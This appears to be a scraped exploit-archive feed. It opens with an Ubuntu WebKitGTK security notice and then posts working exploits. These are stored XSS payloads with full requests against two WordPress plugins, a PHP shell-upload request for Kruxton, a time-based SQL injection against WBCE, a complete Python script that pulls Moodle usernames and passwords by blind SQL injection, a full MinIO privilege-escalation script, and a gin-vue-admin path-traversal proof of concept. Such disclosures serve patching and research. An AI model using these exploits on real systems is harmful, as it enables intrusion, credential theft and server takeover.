Ubuntu Security Notice 6732-1 - Several security issues were discovered in the WebKitGTK Web and JavaScript engines. If a user were tricked into viewing a malicious website, a remote attacker could exploit a variety of issues related to web browser security, including cross-site scripting attacks, denial of service attacks, and arbitrary code execution.

    ==========================================================================Ubuntu Security Notice USN-6732-1April 15, 2024webkit2gtk vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.10- Ubuntu 22.04 LTSSummary:Several security issues were fixed in WebKitGTK.Software Description:- webkit2gtk: Web content engine library for GTK+Details:Several security issues were discovered in the WebKitGTK Web and JavaScriptengines. If a user were tricked into viewing a malicious website, a remoteattacker could exploit a variety of issues related to web browser security,including cross-site scripting attacks, denial of service attacks, andarbitrary code execution.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.10:   libjavascriptcoregtk-4.0-18     2.44.0-0ubuntu0.23.10.1   libjavascriptcoregtk-4.1-0      2.44.0-0ubuntu0.23.10.1   libjavascriptcoregtk-6.0-1      2.44.0-0ubuntu0.23.10.1   libwebkit2gtk-4.0-37            2.44.0-0ubuntu0.23.10.1   libwebkit2gtk-4.1-0             2.44.0-0ubuntu0.23.10.1   libwebkitgtk-6.0-4              2.44.0-0ubuntu0.23.10.1Ubuntu 22.04 LTS:   libjavascriptcoregtk-4.0-18     2.44.0-0ubuntu0.22.04.1   libjavascriptcoregtk-4.1-0      2.44.0-0ubuntu0.22.04.1   libjavascriptcoregtk-6.0-1      2.44.0-0ubuntu0.22.04.1   libwebkit2gtk-4.0-37            2.44.0-0ubuntu0.22.04.1   libwebkit2gtk-4.1-0             2.44.0-0ubuntu0.22.04.1   libwebkitgtk-6.0-4              2.44.0-0ubuntu0.22.04.1This update uses a new upstream release, which includes additional bugfixes. After a standard system update you need to restart any applicationsthat use WebKitGTK, such as Epiphany, to make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6732-1   CVE-2023-42843, CVE-2023-42950, CVE-2023-42956, CVE-2024-23252,   CVE-2024-23254, CVE-2024-23263, CVE-2024-23280, CVE-2024-23284Package Information:   https://launchpad.net/ubuntu/+source/webkit2gtk/2.44.0-0ubuntu0.23.10.1   https://launchpad.net/ubuntu/+source/webkit2gtk/2.44.0-0ubuntu0.22.04.1

Ubuntu Security Notice USN-6732-1

WordPress WP Video Playlist plugin version 1.1.1 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Wordpress Plugin WP Video Playlist 1.1.1 - Stored Cross-Site Scripting (XSS)# Date: 12 April 2024# Exploit Author: Erdemstar# Vendor: https://wordpress.com/# Version: 1.1.1# Proof Of Concept:1. Click Add Video part and enter the XSS payload as below into the first input of form or Request body named "videoFields[post_type]".# PoC Video: https://www.youtube.com/watch?v=05dM91FiG9w# Vulnerable Property at Request: videoFields[post_type]# Payload: <script>alert(document.cookie)</script># Request:POST /wp-admin/options.php HTTP/2Host: erdemstar.localCookie: thc_time=1713843219; booking_package_accountKey=2; wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7C27abdae5aa28462227b32b474b90f0e01fa4751d5c543b281c2348b60f078d2f; wp-settings-time-4=1711124335; cld_2=like; _hjSessionUser_3568329=eyJpZCI6ImY4MWE3NjljLWViN2MtNWM5MS05MzEyLTQ4MGRlZTc4Njc5OSIsImNyZWF0ZWQiOjE3MTEzOTM1MjQ2NDYsImV4aXN0aW5nIjp0cnVlfQ==; wp-settings-time-1=1712096748; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse%26uploader%3D1%26Categories_tab%3Dpop%26urlbutton%3Dfile%26editor%3Dtinymce%26unfold%3D1; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7Cc64c696fd4114dba180dc6974e102cc02dc9ab8d37482e5c4e86c8e84a1f74f9Content-Length: 395Cache-Control: max-age=0Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "macOS"Upgrade-Insecure-Requests: 1Origin: https://erdemstar.localContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://erdemstar.local/wp-admin/admin.php?page=video_managerAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Priority: u=0, ioption_page=mediaManagerCPT&action=update&_wpnonce=29af746404&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dvideo_manager%26settings-updated%3Dtrue&videoFields%5BmeidaId%5D=1&videoFields%5Bpost_type%5D=<script>alert(document.cookie)</script>&videoFields%5BmediaUri%5D=dummy&videoFields%5BoptionName%5D=videoFields&videoFields%5BoptionType%5D=add&submit=Save+Changes

WordPress WP Video Playlist 1.1.1 Cross Site Scripting

Kruxton version 1.0 suffers from a remote shell upload vulnerability.

## Title: kruxton-1.0-FileUpload-RCE  
## Author: nu11secur1ty  
## Date: 04/15/2024  
## Vendor: https://www.mayurik.com/  
## Software: https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html  
## Reference: https://portswigger.net/web-security/file-upload

## Description:  
The system setting with parameter IMG is vulnerable to File Upload  
vulnerability.  
The attacker can upload a very malicious PHP file into the server and  
then he can execute it  
This is a potential CRITICAL PROBLEM!

STATUS: HIGH- Vulnerability

[+]Payload:  
```POST  
POST /kruxton/ajax.php?action=save_settings HTTP/1.1  
Host: localpwnedhost.com  
Cookie: bLicense67=1; sEmail=kurec%40guhai.mi.huq;  
PHPSESSID=lp21rf44drtnogjboa8v7lpmg1  
Content-Length: 1043  
Sec-Ch-Ua: "Chromium";v="123", "Not:A-Brand";v="8"  
Accept: */*  
Content-Type: multipart/form-data;  
boundary=----WebKitFormBoundaryUwsdkjlNQ5exBwrq  
X-Requested-With: XMLHttpRequest  
Sec-Ch-Ua-Mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.88  
Safari/537.36  
Sec-Ch-Ua-Platform: "Windows"  
Origin: https://localpwnedhost.com  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://localpwnedhost.com/kruxton/index.php?page=site_settings  
Accept-Encoding: gzip, deflate, br  
Accept-Language: en-US,en;q=0.9  
Priority: u=1, i  
Connection: close

------WebKitFormBoundaryUwsdkjlNQ5exBwrq  
Content-Disposition: form-data; name="name"

Kruxton Bristo By Mayuri K  
------WebKitFormBoundaryUwsdkjlNQ5exBwrq  
Content-Disposition: form-data; name="email"  
mayuri.infospace@gmail.com  
------WebKitFormBoundaryUwsdkjlNQ5exBwrq  
Content-Disposition: form-data; name="contact"

9000000000  
------WebKitFormBoundaryUwsdkjlNQ5exBwrq  
Content-Disposition: form-data; name="about"

<p>Kruxton Bristo By Mayuri K</p><p data-f-id="pbf" style="text-align:  
center; font-size: 14px; margin-top: 30px; opacity: 0.65; font-family:  
sans-serif;">Powered by <a  
href="https://www.froala.com/wysiwyg-editor?pb=1" title="Froala  
Editor">Froala Editor</a></p>  
------WebKitFormBoundaryUwsdkjlNQ5exBwrq  
Content-Disposition: form-data; name="img"; filename="1nsi1deyou.php"  
Content-Type: application/octet-stream

<?php  
// by nu11secur1ty - 2024  
//Your malicious code here  
?>

------WebKitFormBoundaryUwsdkjlNQ5exBwrq--  
```

## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/kruxton-1.0)

## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2024/04/kruxton-10-fileupload-rce.html)

## Time spent:  
00:15:00

Kruxton 1.0 Shell Upload

WBCE version 1.6.0 suffers from a remote SQL injection vulnerability.

# Exploit Title: |Unauthenticated SQL injection in WBCE 1.6.0  
# Date: 15.11.2023   
# Exploit Author: young pope   
# Vendor Homepage: https://github.com/WBCE/WBCE_CMS   
# Software Link: https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.0.zip   
# Version: 1.6.0   
# Tested on: Kali linux   
# CVE : CVE-2023-39796

There is an sql injection vulnerability in *miniform* module which is a   
default module installed in the *WBCE* cms. It is an unauthenticated   
sqli so anyone could access it and takeover the whole database.

In file /modules/miniform/ajax_delete_message.php there is no   
authentication check. On line |40| in this file, there is a |DELETE|   
query that is vulnerable, an attacker could jump from the query using   
tick sign - ```.

Function |addslashes()|   
(https://www.php.net/manual/en/function.addslashes.php) escapes only   
these characters and not a tick sign:

  * single quote (')  
  * double quote (")  
  * backslash ()  
  * NUL (the NUL byte

The DB_RECORD_TABLE parameter is vulnerable.

If an unauthenticated attacker send this request:

```

POST /modules/miniform/ajax_delete_message.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML,   
like Gecko) Chrome/36.0.1985.125 Safari/537.36  
Connection: close  
Content-Length: 162  
Accept: */*  
Accept-Language: en  
Content-Type: application/x-www-form-urlencoded  
Accept-Encoding: gzip, deflate

action=delete&DB_RECORD_TABLE=miniform_data`+WHERE+1%3d1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+&iRecordID=1&DB_COLUMN=message_id&MODULE=&purpose=delete_record

```

The response is received after 6s.

Reference links:

  * https://nvd.nist.gov/vuln/detail/CVE-2023-39796  
  * https://forum.wbce.org/viewtopic.php?pid=42046#p42046  
  * https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1  
  * https://pastebin.com/PBw5AvGp

WBCE 1.6.0 SQL Injection

Moodle version 3.10.1 suffers from a remote time-based SQL injection vulnerability.

    # Exploit Title: Moodle Authenticated Time-Based Blind SQL Injection - "sort" Parameter# Google Dork: # Date: 04/11/2023# Exploit Author: Julio Ángel Ferrari (Aka. T0X1Cx)# Vendor Homepage: https://moodle.org/# Software Link: # Version: 3.10.1# Tested on: Linux# CVE : CVE-2021-36393import requestsimport stringfrom termcolor import colored# Request detailsURL = "http://127.0.0.1:8080/moodle/lib/ajax/service.php?sesskey=ZT0E6J0xWe&info=core_course_get_enrolled_courses_by_timeline_classification"HEADERS = {    "Accept": "application/json, text/javascript, */*; q=0.01",    "Content-Type": "application/json",    "X-Requested-With": "XMLHttpRequest",    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36",    "Origin": "http://127.0.0.1:8080",    "Referer": "http://127.0.0.1:8080/moodle/my/",    "Accept-Encoding": "gzip, deflate",    "Accept-Language": "en-US,en;q=0.9",    "Cookie": "MoodleSession=5b1rk2pfdpbcq2i5hmmern1os0",    "Connection": "close"}# Characters to testcharacters_to_test = string.ascii_lowercase + string.ascii_uppercase + string.digits + "!@#$^&*()-_=+[]{}|;:'\",.<>?/"def test_character(payload):    response = requests.post(URL, headers=HEADERS, json=[payload])    return response.elapsed.total_seconds() >= 3def extract_value(column, label):    base_payload = {        "index": 0,        "methodname": "core_course_get_enrolled_courses_by_timeline_classification",        "args": {            "offset": 0,            "limit": 0,            "classification": "all",            "sort": "",            "customfieldname": "",            "customfieldvalue": ""        }    }    result = ""    for _ in range(50):  # Assumes a maximum of 50 characters for the value        character_found = False        for character in characters_to_test:            if column == "database()":                base_payload["args"]["sort"] = f"fullname OR (database()) LIKE '{result + character}%' AND SLEEP(3)"            else:                base_payload["args"]["sort"] = f"fullname OR (SELECT {column} FROM mdl_user LIMIT 1 OFFSET 0) LIKE '{result + character}%' AND SLEEP(3)"                        if test_character(base_payload):                result += character                print(colored(f"{label}: {result}", 'red'), end="\r")                character_found = True                break        if not character_found:            break    # Print the final result    print(colored(f"{label}: {result}", 'red'))if __name__ == "__main__":    extract_value("database()", "Database")    extract_value("username", "Username")    extract_value("password", "Password")

Moodle 3.10.1 SQL Injection

WordPress Playlist for Youtube plugin version 1.32 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Wordpress Plugin Playlist for Youtube - Stored Cross-Site Scripting (XSS)# Date: 22 March 2024# Exploit Author: Erdemstar# Vendor: https://wordpress.com/# Version: 1.32# Proof Of Concept:1. Click Add a new playlist and enter the XSS payload as below into the properties named "Name" or "Playlist ID".# PoC Video: https://www.youtube.com/watch?v=jrH5OHBoTns# Vulnerable Properties name: name, playlist_id# Payload: "><script>alert(document.cookie)</script># Request:POST /wp-admin/admin.php?page=playlists_yt_free HTTP/2Host: erdemstar.localCookie: thc_time=1713843219; booking_package_accountKey=2; wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7C27abdae5aa28462227b32b474b90f0e01fa4751d5c543b281c2348b60f078d2f; wp-settings-time-4=1711124335; cld_2=like; _hjSessionUser_3568329=eyJpZCI6ImY4MWE3NjljLWViN2MtNWM5MS05MzEyLTQ4MGRlZTc4Njc5OSIsImNyZWF0ZWQiOjE3MTEzOTM1MjQ2NDYsImV4aXN0aW5nIjp0cnVlfQ==; wp-settings-time-1=1712096748; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse%26uploader%3D1%26Categories_tab%3Dpop%26urlbutton%3Dfile%26editor%3Dtinymce%26unfold%3D1; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7Cc64c696fd4114dba180dc6974e102cc02dc9ab8d37482e5c4e86c8e84a1f74f9Content-Length: 178Cache-Control: max-age=0Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "macOS"Upgrade-Insecure-Requests: 1Origin: https://erdemstar.localContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://erdemstar.local/wp-admin/admin.php?page=playlists_yt_freeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Priority: u=0, i_wpnonce=17357e6139&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dplaylists_yt_free&name="><script>alert(document.cookie)</script>&playlist_id=123&template=1&text_size=123&text_color=%23000000

WordPress Playlist For Youtube 1.32 Cross Site Scripting

MinIO versions prior to 2024-01-31T20-20-33Z suffer from a privilege escalation vulnerability.

    # Exploit Title: MinIO < 2024-01-31T20-20-33Z -  Privilege Escalation# Date: 2024-04-11# Exploit Author: Jenson Zhao# Vendor Homepage: https://min.io/# Software Link: https://github.com/minio/minio/# Version: Up to (excluding) RELEASE.2024-01-31T20-20-33Z# Tested on: Windows 10# CVE : CVE-2024-24747# Required before execution: pip install minio,requestsimport argparseimport datetimeimport tracebackimport urllibfrom xml.dom.minidom import parseStringimport requestsimport jsonimport base64from minio.credentials import Credentialsfrom minio.signer import sign_v4_s3class CVE_2024_24747:    new_buckets = []    old_buckets = []    def __init__(self, host, port, console_port, accesskey, secretkey, verify=False):        self.bucket_names = ['pocpublic', 'pocprivate']        self.new_accesskey = 'miniocvepoc'        self.new_secretkey = 'MINIOcvePOC'        self.headers = {          'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36',          'Content-Type': 'application/json',          'Accept': '*/*'        }        self.accesskey = accesskey        self.secretkey = secretkey        self.verify = verify        if verify:            self.url = "https://" + host + ":" + port            self.console_url = "https://" + host + ":" + console_port        else:            self.url = "http://" + host + ":" + port            self.console_url = "http://" + host + ":" + console_port        self.credits = Credentials(            access_key=self.new_accesskey,            secret_key=self.new_secretkey        )        self.login()        try:            self.create_buckets()            self.create_accesskey()            self.old_buckets = self.console_ls()            self.console_exp()            self.new_buckets = self.console_ls()        except:            traceback.print_stack()        finally:            self.delete_accesskey()            self.delete_buckets()            if len(self.new_buckets) > len(self.old_buckets):                print("There is CVE-2024-24747 problem with the minio!")                print("Before the exploit, the buckets are : " + str(self.old_buckets))                print("After the exploit, the buckets are : " + str(self.new_buckets))            else:                print("There is no CVE-2024-24747 problem with the minio!")    def login(self):        url = self.url + "/api/v1/login"        payload = json.dumps({          "accessKey": self.accesskey,          "secretKey": self.secretkey        })        self.session = requests.session()        if self.verify:            self.session.verify = False        status_code = self.session.request("POST", url, headers=self.headers, data=payload).status_code        # print(status_code)        if status_code == 204:            status_code = 0        else:            print('Login failed! Please check if the input accesskey and secretkey are correct!')            exit(1)    def create_buckets(self):        url = self.url + "/api/v1/buckets"        for name in self.bucket_names:            payload = json.dumps({                "name": name,                "versioning": False,                "locking": False            })            status_code = self.session.request("POST", url, headers=self.headers, data=payload).status_code            # print(status_code)            if status_code == 200:                status_code = 0            else:                print("新建 (New)"+name+" bucket 失败 (fail)！")    def delete_buckets(self):        for name in self.bucket_names:            url = self.url + "/api/v1/buckets/" + name            status_code = self.session.request("DELETE", url, headers=self.headers).status_code            # print(status_code)            if status_code == 204:                status_code = 0            else:                print("删除 (delete)"+name+" bucket 失败 (fail)！")    def create_accesskey(self):        url = self.url + "/api/v1/service-account-credentials"        payload = json.dumps({            "policy": "{              \n    \"Version\":\"2012-10-17\",              \n    \"Statement\":[              \n        {              \n            \"Effect\":\"Allow\",              \n            \"Action\":[              \n                \"s3:*\"              \n            ],              \n            \"Resource\":[              \n                \"arn:aws:s3:::pocpublic\",              \n                \"arn:aws:s3:::pocpublic/*\"              \n            ]              \n        }              \n    ]              \n}",            "accessKey": self.new_accesskey,            "secretKey": self.new_secretkey        })        status_code = self.session.request("POST", url, headers=self.headers, data=payload).status_code        # print(status_code)        if status_code == 201:            # print("新建 (New)" + self.new_accesskey + " accessKey 成功 (success)！")            # print(self.new_secretkey)            status_code = 0        else:            print("新建 (New)" + self.new_accesskey + " accessKey 失败 (fail)！")    def delete_accesskey(self):        url = self.url + "/api/v1/service-accounts/" + base64.b64encode(self.new_accesskey.encode("utf-8")).decode('utf-8')        status_code = self.session.request("DELETE", url, headers=self.headers).status_code        # print(status_code)        if status_code == 204:            # print("删除" + self.new_accesskey + " accessKey成功！")            status_code = 0        else:            print("删除 (delete)" + self.new_accesskey + " accessKey 失败 (fail)！")    def headers_gen(self,url,sha256,method):        datetimes = datetime.datetime.utcnow()        datetime_str = datetimes.strftime('%Y%m%dT%H%M%SZ')        urls = urllib.parse.urlparse(url)        headers = {            'X-Amz-Content-Sha256': sha256,            'X-Amz-Date': datetime_str,            'Host': urls.netloc,        }        headers = sign_v4_s3(            method=method,            url=urls,            region='us-east-1',            headers=headers,            credentials=self.credits,            content_sha256=sha256,            date=datetimes,        )        return headers    def console_ls(self):        url = self.console_url + "/"        sha256 = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"        headers = self.headers_gen(url,sha256,'GET')        if self.verify:            response = requests.get(url,headers=headers,verify=False)        else:            response = requests.get(url, headers=headers)        DOMTree = parseString(response.text)        collection = DOMTree.documentElement        buckets = collection.getElementsByTagName("Bucket")        bucket_names = []        for bucket in buckets:            bucket_names.append(bucket.getElementsByTagName("Name")[0].childNodes[0].data)        # print('当前可查看的bucket有:\n' + str(bucket_names))        return bucket_names    def console_exp(self):        url = self.console_url + "/minio/admin/v3/update-service-account?accessKey=" + self.new_accesskey        sha256 = "0f87fd59dff29507f82e189d4f493206ea7f370d0ce97b9cc8c1b7a4e609ec95"        headers = self.headers_gen(url, sha256, 'POST')        hex_string = "e1fd1c29bed167d5cf4986d3f224db2994b4942291dbd443399f249b84c79d9f00b9e0c0c7eed623a8621dee64713a3c8c63e9966ab62fcd982336"        content = bytes.fromhex(hex_string)        if self.verify:            response = requests.post(url,headers=headers,data=content,verify=False)        else:            response = requests.post(url,headers=headers,data=content)        status_code = response.status_code        if status_code == 204:            # print("提升" + self.new_accesskey + " 权限成功！")            status_code = 0        else:            print("提升 (promote)" + self.new_accesskey + " 权限失败 (Permission failed)！")if __name__ == '__main__':    logo = """                            ____    ___   ____   _  _           ____   _  _    _____  _  _    _____   ___ __   __  ___        |___ \  / _ \ |___ \ | || |         |___ \ | || |  |___  || || |  |___  | / __|\ \ / / / _ \ _____   __) || | | |  __) || || |_  _____   __) || || |_    / / | || |_    / / | (__  \ V / |  __/|_____| / __/ | |_| | / __/ |__   _||_____| / __/ |__   _|  / /  |__   _|  / /   \___|  \_/   \___|       |_____| \___/ |_____|   |_|         |_____|   |_|   /_/      |_|   /_/                               """    print(logo)    parser = argparse.ArgumentParser()    parser.add_argument("-H", "--host", required=True, help="Host of the target. example: 127.0.0.1")    parser.add_argument("-a", "--accesskey", required=True, help="Minio AccessKey of the target. example: minioadmin")    parser.add_argument("-s", "--secretkey", required=True, help="Minio SecretKey of the target. example: minioadmin")    parser.add_argument("-c", "--console_port", required=True, help="Minio console port of the target. example: 9000")    parser.add_argument("-p", "--port", required=True, help="Minio port of the target. example: 9090")    parser.add_argument("--https", action='store_true', help="Is MinIO accessed through HTTPS.")    args = parser.parse_args()    CVE_2024_24747(args.host,args.port,args.console_port,args.accesskey,args.secretkey,args.https)

MinIO Privilege Escalation

### Impact
"gin-vue-admin<=v2.6.1 has a code injection vulnerability in the backend. In the Plugin System -> Plugin Template feature, an attacker can perform directory traversal by manipulating the 'plugName' parameter. They can create specific folders such as 'api', 'config', 'global', 'model', 'router', 'service', and 'main.go' function within the specified traversal directory. Moreover, the Go files within these folders can have arbitrary code inserted based on a specific PoC parameter."

Affected code: https://github.com/flipped-aurora/gin-vue-admin/blob/746af378990ebf3367f8bb3d4e9684936df152e7/server/api/v1/system/sys_auto_code.go:239. Let's take a look at the method 'AutoPlug' within the 'AutoCodeApi' struct.
```go
func (autoApi *AutoCodeApi) AutoPlug(c *gin.Context) {
	var a system.AutoPlugReq
	err := c.ShouldBindJSON(&a)
	if err != nil {
		response.FailWithMessage(err.Error(), c)
		return
	}
	a.Snake = strings.ToLower(a.PlugName)
	a.NeedModel = a.HasRequest || a.HasResponse
	err = autoCodeService.CreatePlug(a)
	if err != nil {
		global.GVA_LOG.Error("预览失败!", zap.Error(err))
		response.FailWithMessage("预览失败", c)
		return
	}
	response.Ok(c)
}
```
The main reason for the existence of this vulnerability is the controllability of the PlugName field within the struct.
```go
type AutoPlugReq struct {
	PlugName    string         `json:"plugName"` // 必然大写开头
	Snake       string         `json:"snake"`    // 后端自动转为 snake
	RouterGroup string         `json:"routerGroup"`
	HasGlobal   bool           `json:"hasGlobal"`
	HasRequest  bool           `json:"hasRequest"`
	HasResponse bool           `json:"hasResponse"`
	NeedModel   bool           `json:"needModel"`
	Global      []AutoPlugInfo `json:"global,omitempty"`
	Request     []AutoPlugInfo `json:"request,omitempty"`
	Response    []AutoPlugInfo `json:"response,omitempty"`
}
```
POC：
```
POST /api/autoCode/createPlug HTTP/1.1
Host: 192.168.31.18:8080
Content-Length: 326
Accept: application/json, text/plain, */*
x-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJVVUlEIjoiNzJlZWQ4OTUtYzUwOC00MDFiLWIyYzQtMTk2MWMyOTlkOWNhIiwiSUQiOjEsIlVzZXJuYW1lIjoiYWRtaW4iLCJOaWNrTmFtZSI6Ik1yLuWlh-a3vCIsIkF1dGhvcml0eUlkIjo4ODgsIkJ1ZmZlclRpbWUiOjg2NDAwLCJpc3MiOiJxbVBsdXMiLCJhdWQiOlsiR1ZBIl0sImV4cCI6MTcxMjIxMTM4MywibmJmIjoxNzExNjA2NTgzfQ.uq61pJNi4kzUXb8lEkVa7NBCBvp_Ye59fee-TJV_rpE
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
x-user-id: 1
Content-Type: application/json
Origin: http://192.168.31.18:8080
Referer: http://192.168.31.18:8080/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,ja;q=0.6
Cookie: x-token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJVVUlEIjoiNzJlZWQ4OTUtYzUwOC00MDFiLWIyYzQtMTk2MWMyOTlkOWNhIiwiSUQiOjEsIlVzZXJuYW1lIjoiYWRtaW4iLCJOaWNrTmFtZSI6Ik1yLuWlh-a3vCIsIkF1dGhvcml0eUlkIjo4ODgsIkJ1ZmZlclRpbWUiOjg2NDAwLCJpc3MiOiJxbVBsdXMiLCJhdWQiOlsiR1ZBIl0sImV4cCI6MTcxMjIyMDA4NiwibmJmIjoxNzExNjE1Mjg2fQ.XVV97Ky17E9pUO_byVgK--FnAp9ye4Tpab2jnma6dBU
Connection: close

{"plugName":"../../../server/","routerGroup":"111"	,"hasGlobal":true,"hasRequest":false,"hasResponse":false,"global":[{"key":"1","type":"1","desc":"1"},{"key":"type","value":"faspohgoahgioahgioahgioashogia","desc":"1","type":"string"}],"request":[{"key":"","type":"","desc":""}],"response":[{"key":"","type":"","desc":""}]}
```
By performing directory traversal and creating directories such as api, config, global, model, router, and service within the gin-vue-admin/server directory, an attacker can tamper with the source code and the main.go file. They can potentially overwrite or tamper with the Go source code files located in the directory C:\代码审计\server to further compromise the system.
![image](https://github.com/flipped-aurora/gin-vue-admin/assets/142187061/c2cad65a-6401-41c2-ba0d-6eb5e3760516)
![image](https://github.com/flipped-aurora/gin-vue-admin/assets/142187061/681ca156-c125-4a9f-9443-825a34a89b2d)
![image](https://github.com/flipped-aurora/gin-vue-admin/assets/142187061/6870ce90-8166-48c7-a02c-29c4429283d4)


### Patches
Please wait for the latest patch

### Workarounds
You can use the following filtering methods to rectify the directory traversal problem
if strings.Index(plugPath, "..") > -1 {
        fmt.Println("no bypass",plugPath)
    }
### References
https://github.com/flipped-aurora/gin-vue-admin


**Impact**

"gin-vue-admin<=v2.6.1 has a code injection vulnerability in the backend. In the Plugin System -> Plugin Template feature, an attacker can perform directory traversal by manipulating the 'plugName' parameter. They can create specific folders such as 'api', 'config', 'global', 'model', 'router', 'service', and 'main.go' function within the specified traversal directory. Moreover, the Go files within these folders can have arbitrary code inserted based on a specific PoC parameter."

Affected code: https://github.com/flipped-aurora/gin-vue-admin/blob/746af378990ebf3367f8bb3d4e9684936df152e7/server/api/v1/system/sys\_auto\_code.go:239. Let's take a look at the method 'AutoPlug' within the 'AutoCodeApi' struct.

func (autoApi \*AutoCodeApi) AutoPlug(c \*gin.Context) {
	var a system.AutoPlugReq
	err := c.ShouldBindJSON(&a)
	if err != nil {
		response.FailWithMessage(err.Error(), c)
		return
	}
	a.Snake \= strings.ToLower(a.PlugName)
	a.NeedModel \= a.HasRequest || a.HasResponse
	err \= autoCodeService.CreatePlug(a)
	if err != nil {
		global.GVA\_LOG.Error("预览失败!", zap.Error(err))
		response.FailWithMessage("预览失败", c)
		return
	}
	response.Ok(c)
}

The main reason for the existence of this vulnerability is the controllability of the PlugName field within the struct.

type AutoPlugReq struct {
	PlugName    string         \`json:"plugName"\` // 必然大写开头
	Snake       string         \`json:"snake"\`    // 后端自动转为 snake
	RouterGroup string         \`json:"routerGroup"\`
	HasGlobal   bool           \`json:"hasGlobal"\`
	HasRequest  bool           \`json:"hasRequest"\`
	HasResponse bool           \`json:"hasResponse"\`
	NeedModel   bool           \`json:"needModel"\`
	Global      \[\]AutoPlugInfo \`json:"global,omitempty"\`
	Request     \[\]AutoPlugInfo \`json:"request,omitempty"\`
	Response    \[\]AutoPlugInfo \`json:"response,omitempty"\`
}

POC：

    POST /api/autoCode/createPlug HTTP/1.1
    Host: 192.168.31.18:8080
    Content-Length: 326
    Accept: application/json, text/plain, */*
    x-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJVVUlEIjoiNzJlZWQ4OTUtYzUwOC00MDFiLWIyYzQtMTk2MWMyOTlkOWNhIiwiSUQiOjEsIlVzZXJuYW1lIjoiYWRtaW4iLCJOaWNrTmFtZSI6Ik1yLuWlh-a3vCIsIkF1dGhvcml0eUlkIjo4ODgsIkJ1ZmZlclRpbWUiOjg2NDAwLCJpc3MiOiJxbVBsdXMiLCJhdWQiOlsiR1ZBIl0sImV4cCI6MTcxMjIxMTM4MywibmJmIjoxNzExNjA2NTgzfQ.uq61pJNi4kzUXb8lEkVa7NBCBvp_Ye59fee-TJV_rpE
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
    x-user-id: 1
    Content-Type: application/json
    Origin: http://192.168.31.18:8080
    Referer: http://192.168.31.18:8080/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,ja;q=0.6
